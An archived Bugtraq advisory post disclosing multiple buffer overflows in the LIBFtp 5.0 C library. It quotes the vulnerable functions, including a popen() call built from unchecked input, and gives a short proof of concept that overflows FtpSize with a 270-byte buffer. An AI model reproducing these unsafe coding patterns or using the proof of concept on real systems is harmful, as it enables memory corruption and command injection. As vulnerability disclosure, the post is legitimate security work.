LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow

To: securityfocus <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow
From: "starcadi starcadi" <starcadi@xxxxxxxxx>
Date: Thu, 15 Mar 2007 20:42:31 +0100
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=h6vBoPLha00lUUoF42JFX+RERpLXfTjZb4+3sbd5GYE5q3EN2sSN4tYxi6tKg8WLfdWgs+q1+P92darqERc+oqktTvKdXhvYlTxB0btwxHjh+RW+GwErg6U6z00wu+COyxBxE/NEtPVHjUoSQF8SVtm9yyOalpAQ8SokGiAc7c8=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=rlEOZag4baDOpi9UkuY5hoe45UrswnKEn5GwK67dRL7iGEYGLesQ3+WheEL/ovCEb+hB/GQXnLnCHdIU8WpQ031CKn5yT5ybrs1XOcMhqSEGUQNY4ke7BPuq1HHA+PZR068JtZ5vOXQnC56Li8xtU0nQhdew9+wqx01wNSkdZo8=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

http://www.netsw.org/net/ip/filetrans/ftp/libftp/

Description


the library has a multiple (sprintf(), strcpy()) buffer overflow in
various functions.

Source errors


fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize()

the FtpString is a typedef of an array with 256bytes:
FtpLibrary.h: typedef char FtpString[256];

..
STATUS FtpChmod(FTP *ftp,char *file,int mode)
{
 FtpString msg;

 sprintf(msg,"SITE CHMOD %03o %s",mode,file);
 return FtpCommand(ftp,msg,"",200,EOF);

}

..

int FtpArchie ( char *what, ARCHIE *result, int len)
{
 FILE *archie;
 FtpString cmd,tmp;
 int i;

 bzero(result,sizeof(result[0])*len);

 sprintf(cmd,"archie -t -l -m %d %s",len,what);

 if ((archie = popen(cmd,"r"))==NULL)
   return 0;

..

STATUS FtpDebugDebug(FTP *ftp,int n, char * Message)
{
 FtpString tmp;


 strcpy(tmp,Message);

 if (strncmp(tmp,"PASS ",5)==0)
   {
     char *p=tmp+5;
     while ( *p != '\0') *p++='*';
   };

..

STATUS FtpOpenDir(FTP * con,char * file)
{
 FtpString command;

 if ( file == NULL || *file == '\0' )
   strcpy(command,"NLST");
 else
   sprintf(command,"NLST %s",file);

 return FtpCommand(con,command,"",120,150,200,EOF);
}

..

int FtpSize(FTP * con, char *filename)
{
 FtpString tmp;
 int i,size;

 strcpy(tmp,"SIZE ");
 strcat(tmp,filename);

 if ( FtpSendMessage(con,tmp) == QUIT )
   return EXIT(con,QUIT);
..

POC


#include <FtpLibrary.h>

#define OVF_BUF (270)

int main()
{
        char *buf;

        buf = (char *) malloc(OVF_BUF+1);
        memset(buf, 'A', OVF_BUF);

        // insert function to init ftp connection..
        // insert function to manage ftp connection..

        // calling vulnerable function example FtpSize()
        FtpSize(NULL, buf);

        // insert function to close ftp connection..

        return(0);
}

--
~ starcadi

Prev by Date: - Call for chapters - Handbook of Research on Digital Anti-forensics and In-security Governance
Next by Date: Re: Firekeeper - IDS for Firefox available
Previous by thread: - Call for chapters - Handbook of Research on Digital Anti-forensics and In-security Governance
Next by thread: vbulletin admincp sql injection
Index(es):
- Date
- Thread